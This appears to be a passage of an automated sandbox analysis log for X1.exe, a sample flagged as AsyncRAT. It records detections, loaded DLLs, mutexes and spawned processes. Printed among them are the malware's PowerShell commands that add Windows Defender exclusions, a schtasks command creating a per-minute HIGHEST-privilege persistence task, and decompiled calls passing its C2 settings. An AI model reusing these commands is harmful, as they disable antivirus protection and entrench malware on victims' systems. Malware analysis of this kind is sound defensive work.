                            Source: 00000000.00000000.2025401364.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: C:\Users\user\AppData\Roaming\X1.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: X1.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: X1.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: X1.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                            Source: X1.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: X1.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: X1.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                            Source: X1.exe, Settings.csBase64 encoded string: 'o5Jn5yH3X3IW9rBZIc1QrapCzGC9Pnb5ogILY0md+607/gs7gZMVIIkkheUqNUXM', 'qytL3sbXX+WCCfzYhXTgM0OeGWr0h9LLUn/PRLUwcd2iZCI2TQ33DJcqJ7Ii79RH', 'ze8K7NgV85FNCj/gaOBbf+dBYU+WrSwD+D5fKSncjmmUF8+s1Yj4Iu80vlw0NDro'
                            Source: X1.exe.0.dr, Settings.csBase64 encoded string: 'o5Jn5yH3X3IW9rBZIc1QrapCzGC9Pnb5ogILY0md+607/gs7gZMVIIkkheUqNUXM', 'qytL3sbXX+WCCfzYhXTgM0OeGWr0h9LLUn/PRLUwcd2iZCI2TQ33DJcqJ7Ii79RH', 'ze8K7NgV85FNCj/gaOBbf+dBYU+WrSwD+D5fKSncjmmUF8+s1Yj4Iu80vlw0NDro'
                            Source: X1.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: X1.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: X1.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: X1.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/17@2/3
                            Source: C:\Users\user\Desktop\X1.exeFile created: C:\Users\user\AppData\Roaming\X1.exeJump to behavior
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4296:120:WilError_03
                            Source: C:\Users\user\AppData\Roaming\X1.exeMutant created: NULL
                            Source: C:\Users\user\Desktop\X1.exeMutant created: \Sessions\1\BaseNamedObjects\wR68bAqsujrl6VoA
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4220:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_03
                            Source: C:\Users\user\Desktop\X1.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                            Source: X1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: X1.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            Source: C:\Users\user\Desktop\X1.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: X1.exeReversingLabs: Detection: 78%
                            Source: X1.exeVirustotal: Detection: 71%
                            Source: C:\Users\user\Desktop\X1.exeFile read: C:\Users\user\Desktop\X1.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\X1.exe "C:\Users\user\Desktop\X1.exe"
                            Source: C:\Users\user\Desktop\X1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\X1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'X1.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\X1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\X1.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\X1.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "X1" /tr "C:\Users\user\AppData\Roaming\X1.exe"
                            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\X1.exe "C:\Users\user\AppData\Roaming\X1.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\X1.exe "C:\Users\user\AppData\Roaming\X1.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\X1.exe C:\Users\user\AppData\Roaming\X1.exe
                            Source: C:\Users\user\Desktop\X1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'X1.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\X1.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "X1" /tr "C:\Users\user\AppData\Roaming\X1.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: avicap32.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: msvfw32.dllJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\X1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                            Source: X1.lnk.0.drLNK file: ..\..\..\..\..\X1.exe
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: X1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: X1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Data Obfuscation

                            barindex
                            .NET source code contains method to dynamically call methods (often used by packers)
                            Source: X1.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: X1.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: X1.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
